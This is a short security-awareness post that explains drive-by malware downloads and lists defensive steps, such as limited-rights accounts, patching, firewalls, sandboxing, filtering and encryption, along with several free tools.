Drive-By Malware

This post identifies preventative measures that both end users and web site managers can take against the dangers of drive-by malware.

Drive-by malware is:

A download which the user may have indirectly authorized by clicking on a link, or by being redirected to a malicious webpage through a misleading link without understanding the consequences of these actions.  For instance the user could be installing an unknown ActiveX component or Java applet.   Any of this could also happen without the user even knowing about it if the webpage the user goes to has had code injected into it.  This happens to legitimate sites far more often than anyone would care to believe.

The damage ensues when the download contains any kind of malware through exploitation of a browser, mail reader, other application or operating system bug, without any user interaction whatsoever.

Common occurrences of drive-by downloads happen when a user:

  • Visits a a malicious or compromised website.
  • Views an email message containing malicious scripts.
  • Clicks on a link included in an email message.
  • Clicks within a deceptive popup window believing it is a system message or anti-virus program.

Recommended Mitigation Steps

In order of simplicity:

  • Run your computer with the appropriate rights!
    • Admin accounts are for administration.
    • Setup a user account with lower permissions.
  • Use strong passwords for system access and for encryption.
  • Do not use the same password for multiple devices / services.
  • Do not open email from unknown senders.
  • Install and use email reputation tools such as Trend Micro’s eMail-ID tool.  (Still free!)
  • Never click on attachments or links embedded within emails, even when the emails are from friends.  A friend may not realize it is infected with malware.
  • Do not go to web sites that could be potentially dangerous.  Use a website reputation filter like Trend Micro’s WebProtection Add-on.  (Still free!)
  • Be careful with what and where you share your personal info. 
  • Install an anti-malware package on every workstation you use.
  • Use a browser with anti-malware/phishing features.
  • Judiciously apply security patches to:
    • Operating system software.
    • Anti-malware software.
    • Browser software.
    • All other application software.
  • At the very least, install a personal firewall in front of any Internet facing computer.
  • Invest in a good, reliable and configurable hardware firewall.
  • Install and use a “sandbox” (Sandboxie is still free!)
  • Make use of DNS services to restrict access to known malicious content.  (OpenDNS is still free!)
  • Install and configure a web-content filter product.  (K9 is still free from BlueCoat!)
  • Use access control applications like “DropMyRights” to launch apps with restricted permissions. (Still free!)
  • Do not store unencrypted personal information on a workstation.  Install and use BitLocker (free!), PGP (commercial), Sophos (free!), Trend Micro’s Email Encryption Service (free!) or other encryption products.

In a business environment of any size, set your policies appropriately, install the correct enterprise-level controls based on the above list, and monitor your environment for compliance and attacks with IDS/IPS, policy management, performance management and security management  tools.  Oh yeah, and hire a good consultant…